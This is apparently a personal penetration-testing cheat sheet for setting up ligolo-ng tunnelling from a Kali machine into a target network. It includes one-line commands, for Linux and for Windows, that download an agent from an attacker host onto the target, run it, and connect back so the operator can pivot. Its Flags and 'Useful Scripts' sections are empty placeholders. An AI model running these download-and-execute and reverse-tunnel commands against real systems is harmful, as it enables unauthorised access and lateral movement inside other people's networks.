Pre-made commands

On KALI machine, run this to start the program.
sudo ip tuntap add user kali mode tun ligolo && sudo ip link set ligolo up && /home/kali/scripts/ligolo-ng/proxy -selfcert
LINUX: On the TARGET machine, run this. Ensure updog server is running, and pwd is the /tmp/ folder
wget 192.168.45.155:9876/linux/linux-ligolo-agent && chmod +x ./linux-ligolo-agent && ./linux-ligolo-agent -connect 192.168.45.216:11601 -ignore-cert
Type session in to the ligolo UI, select the correct machine, then type ifconfig. Find the correct network, and add the route with the following, OUTSIDE LIGOLO:
sudo ip route add 192.168.0.0/24 dev ligolo
Now, simply type start in to the ligolo UI to start the tunnel. You can now access the network without using proxychains (for example with the above network, you can now ping 192.168.0.123, where you couldnt before.)
On windows:
iwr -uri http://192.168.45.155:9876/windows/windows-ligolo-agent.exe -Outfile ligolo.exe
./ligolo.exe -connect 192.168.49.130:11601 -ignore-cert

Flags

FlagDescription
-xWhat does it do

Useful Scripts

Useful bash script
#!/bin/bash